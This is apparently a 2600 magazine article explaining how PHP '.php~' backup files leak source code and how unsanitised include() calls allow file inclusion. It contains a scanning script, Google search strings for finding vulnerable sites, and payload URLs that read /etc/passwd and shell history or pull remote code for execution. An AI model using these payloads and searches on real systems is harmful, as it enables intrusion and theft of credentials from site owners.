Google Tem-PHP-tations

by Craig Stephenson  (cstephen907@gmail.com)

This article originally had nothing to do with Google.

It started as an interesting observation about tildes that led to a couple of unsettling thoughts about search engine URL pattern matching.  I get the feeling that I've only scratched the surface.  The ability to search for websites based on their URLs opens many doors, and that might just be a problem if the wrong person knows the right thing to search for.

Note that while this article is written with PHP in mind, the same concepts might also apply to other web languages.  The tilde observation in particular is really more about Apache than PHP.

The .php~ Problem

I've done web development on mostly Linux machines for several years.

During this time, I've noticed myself and others occasionally junking up web directories with useless Emacs/gedit backup files.  This configuration option is enabled by default on some Linux distributions.

When a file is edited using one of these text editors, a backup copy of the original file is automatically saved as: <filename>~

For example, myfile.txt backs up as myfile.txt~.

This feature can avert disaster if a file is accidentally removed or damaged, but otherwise it's easy to forget it's happening.  GNOME even goes the extra step of hiding files ending with " ~ ".

While accumulating hoards of mostly-useless backup files is annoying in its own right, the real problem is that Apache relies on a file's extension to know how to serve it.

A properly configured Apache server knows that a file ending in .php needs to be processed server-side before sending any content to the user.  Unlike utilities such as the file command, Apache doesn't automagically know a file's type by its contents.  Rename a file's extension and Apache will change the Content-Type HTTP header accordingly.  It's fickle like that.

What happens if you rename a .php file to .php~?

Apache won't recognize the file as a PHP script and makes no attempt to process it as such, opting instead to treat it as a plain text document.  Now all of the PHP code never intended for user eyes is visible to all.  Or, to be more accurate, the previous version of the PHP code.  But the differences are probably slight.

So, chances are good that anybody using Emacs or gedit to edit PHP files directly in their web directory is creating publicly exposed backups of their files.  Finding them is as easy as adding a " ~ " at the end of the URL.  This isn't necessarily the end of the world.  What secrets might one expect to find in exposed PHP code anyway?

Database passwords come to mind.  Any MySQL-driven PHP website is likely to have a hard-coded database password.  Usually in plain sight, like this:
mysql_connect('localhost', 'username', 'password');
Alarming though this may look, it's rare to find MySQL servers that accept remote connections.

That's not to say a curious person on the same network couldn't wreak some havoc.  A MySQL password might also open the door for some neighborly snooping on a shared web hosting provider.  And, of course, there's always the very real possibility that the reckless novice who runs this website uses the same password for a lot of things, such as logging into their web account, email account, or SSH account.

If you're adept at PHP, an exposed file can be an exciting can of worms.  Are there any other hard-coded passwords?  Is the code referencing files or file paths you're not supposed to know about?  Does the code neglect to properly validate user input?  Is there evidence that the server has register_globals enabled?  Are there any juicy comments?

The problem can be solved in a number of ways.

Emacs' or gedit's automatic backup feature can be disabled.  Programmers can refrain from editing production copies of scripts, which is bad practice anyway.  Apache can be configured to not serve .php~ files.  Even some old-fashioned housekeeping would keep trouble at bay.  But a web developer is unlikely to make these changes unless they are already aware of the problem.

It's simple enough to scan a website for tilde'd files.  Simple, if not pretty:

get-php.sh:
# Recursively download PHP files.
wget -r -A *php* -T 3 -t 1 http://www.example.com

# Files are stored in a directory named after website domain.
# Use find and Perl to list every PHP file, append ~, then attempt to access.
find . -iname '*.php*' |
perl -ne 'if (m/\.\/(.*\.php)/) { print "http:\/\/$1~\n" }' |
sort | uniq |
wget -i - --spider --max-redirect=0 -T 3 2>&1 |
grep -B 6 "Remote file exists"
But this takes forever, even just for one website.

You can increase your odds of finding a website with tilde'd files by looking out for websites that meet the following criteria:

Running on a Linux machine with interactive login access.

Running small-scale, custom-made PHP code.

Personal websites hosted on university computer science department servers seem most susceptible, which is ironic but not shocking.

The following Google search string can help you unearth some of those:
site:*.edu/*.php cs
Or, if you want a sneak peak at what's out there, you might just search for this:
site:*/*.php~
Unfortunately, you have to wade through a lot of crap to find the interesting stuff.

God knows how these URLs got indexed in the first place. Probably at one time or another, all of these websites were missing an HTML or PHP index file and Apache's auto-indexing revealed the tilde'd files to Google.

The GET/include() Problem

It's hard to imagine that somebody would have a legitimate reason to search for a URL ending with tilde.

I was amazed that Google dutifully returns the results for these types of searches given its history of highly granular manual intervention (e.g., Google.cn censorship, Google's instant blacklisting).

Don't they know they're inviting trouble? What else don't they know?

There's another problem I've seen once or twice during my experiences with PHP.

It starts with the include() function, which allows a PHP script to include (execute) the code from another PHP script.

You might use this function, for example, to import common configuration variables into a page:
<?php
  include("config.php");
  // page content
?>
Less judicious web developers use include() to pull in common chunks of HTML code.

For example:
<?php
  include("header.php");
  // page content
  include("footer.php");
?>
And some developers like to use include() for just about everything.

For example:
<?php
  include("header.php");
  include($page);
  include("footer.php");
?>
The problem with this last example is that the script needs to know what page the user is trying to access to include the appropriate file.

The oft-used and ill-advised solution is to get the name of the page's PHP file from the request's GET parameters. If the URL looks like this:
http://www.example.com/index.php?page=contact.php
Then chances are good that index.php contains the following line: include($_GET['page']);

In many cases, you can confirm these suspicions by throwing some random nonsense into the page parameter. Results will vary depending on the website's level of error reporting and error handling, but it's not uncommon for something like this:
http://www.example.com/index.php?page=asdf
To return something like this:
Warning: include(asdf) [function.include]: failed to open stream: No such file or directory in /home/jdoe/public_html/index.php on line 147
This very explicit admission of insecurity comes complete with the full file system path of the website's document root.

You can throw whatever you want into the page parameter and the PHP script will try to include() it. Including any text file will generally display it right in the web page.

There are a variety of safeguards the server might have in place that could mitigate this vulnerability, such as running Apache in a chroot jail, but especially unhardened servers will let you sneak one of these by:
http://www.example.com/index.php?page=/etc/passwd
Although you're hindered by the fact that you can't run the ls command, there are clever ways you might be able to learn more about the machine.

Who knows what treasures are hiding in a shell history file, if one exists?:
http://www.example.com/index.php?page=../.bash_history
If you're lucky enough to find a web server with PHP's allow_url_include configuration flag enabled, you can even do this:
http://www.example.com/index.php?page=http://www.legitimate.com/remotefile.txt
There's really no use in this, however, unless you get thrills from seeing your text appear on somebody else's website.

It would be far more interesting to get the website to include your own code. You could always set up your own Apache server and tell it to serve PHP files as plain text so they don't get processed before being served.

But why go through the trouble when PHP's include() function will execute code regardless of the file's extension?

In other words, allow_url_include lets you do the following:
http://www.example.com/index.php?page=http://www.legitimate.com/phpscript.txt
But I'm surely not the first person to connect these dots.

What does this have to do with Google, anyway? Simply that, as I write this, the following search string claims "407,000,000" tempting results:
site:*/*.php%3f*=*.php
Code: get-php.sh

Return to $2600 Index